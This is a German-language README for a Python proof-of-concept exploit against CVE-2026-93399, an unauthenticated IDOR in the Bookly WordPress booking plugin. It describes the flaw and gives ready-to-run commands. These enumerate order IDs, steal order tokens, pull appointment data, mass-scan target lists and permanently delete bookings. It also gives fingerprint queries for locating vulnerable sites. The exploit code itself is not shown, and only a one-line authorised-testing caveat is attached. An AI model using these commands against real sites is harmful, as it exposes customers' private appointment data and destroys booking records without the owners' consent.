
Python-PoC für CVE-2026-93399, eine unauthentifizierte IDOR in Bookly <= 28.2, die Bestell-Token preisgibt, Termine offenlegt und Buchungen zurücksetzt.
Python-3-PoC für CVE-2026-93399 in Bookly (bookly-responsive-appointment-booking-tool).
CVE-2026-93399 — Bookly ≤ 28.2 ist von einer Insecure Direct Object Reference (CWE-639) bei öffentlichen Buchungs-AJAX-Aufrufen betroffen: bookly_get_form_id speichert eine angreiferkontrollierte order_id in der Formular-Session, und bookly_render_complete gibt das geheime bookly_order-Token dieser Bestellung zurück, ohne zu prüfen, ob die Session die Bestellung erstellt hat. Nicht authentifizierte Angreifer können Order-IDs enumerieren, Tokens stehlen, Termindaten über bookly_add_to_calendar abrufen und nicht abgeschlossene Buchungen mit bookly_rollback_order stornieren/löschen. CVSS 3.1: 9.1 Critical (C:N/I:H/A:H). Behoben in > 28.2.
PoC-Seite: https://pocbit.org/pocs/cve-2026-93399
Katalogindex: https://pocbit.org/pocs/
pip install -r requirements.txt
python poc.py -u https://site.example --mode check
python poc.py -u https://site.example --mode check --order-id 15
python poc.py -u https://site.example --mode check --order-start 1 --order-end 30
python poc.py -u https://site.example --mode exploit --order-id 15 --calendar
python poc.py -u https://site.example --mode exploit --order-id 15 --rollback --confirm-delete
python poc.py --list targets.example.txt --mode check -j 10 --order-start 1 --order-end 5
body="/wp-content/plugins/bookly-responsive-appointment-booking-tool/"
body="bookly_get_form_id"
Nur autorisiertes Testen. --rollback --confirm-delete entfernt Buchungen dauerhaft.